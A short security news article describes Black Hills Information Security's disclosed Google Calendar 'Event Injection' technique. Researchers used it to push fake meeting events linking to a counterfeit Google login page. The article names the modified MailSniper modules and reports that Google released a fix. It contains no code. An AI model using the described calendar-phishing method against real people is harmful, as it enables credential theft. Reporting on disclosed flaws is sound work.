Along with Gmail and Google Drive, Google offers its users Google Calendar service, designed for scheduling meetings, events and cases. Event reminders can be sent via email and Push notifications. The service provides a function that automatically adds to the Calendar various events contained in the body of the message. Black Hills Information Security (BHIS) experts discovered an interesting vulnerability that allows to bypass protection and add an event to the calendar without sending an email using the MailSniper tool. According to the researchers, this vulnerability, called Event Injection, offers a new opportunity for phishing.

According to experts, if a Google account is tied to the phone of the victim, it is possible to generate an event notification that will be displayed directly on the device and will be sent in an e-mail. As part of the experiment, the researchers created an event allegedly about a general corporate meeting, which will take place in 10 minutes. In the body of the event, experts added a link to the agenda, which every employee should read. In fact, the link led to a fake Google authorization page where users were required to enter their credentials in order to access information. As noted by the researchers, this method was very successful.

To exploit the vulnerability, BHIS employees modified the MailSniper tool, adding several new modules. The first method of operation (Invoke-InjectGEvent) assumes the existence of credentials to the Google account, the second (Invoke-InjectGEventAP) - provides a connection directly to the Google API. A detailed description of both methods is available in the researchers blog.

Experts informed Google about the vulnerability on October 9 this year. October 17, the company released an update, which added settings that prevent the implementation of the event in the Calendar.

MailSniper is a tool for finding specific terms (passwords, internal information, network architecture information, etc.).. ) in corporate or ordinary e-mails. It can also be used by Microsoft Exchange service administrators to view the mailboxes of any user in the domain.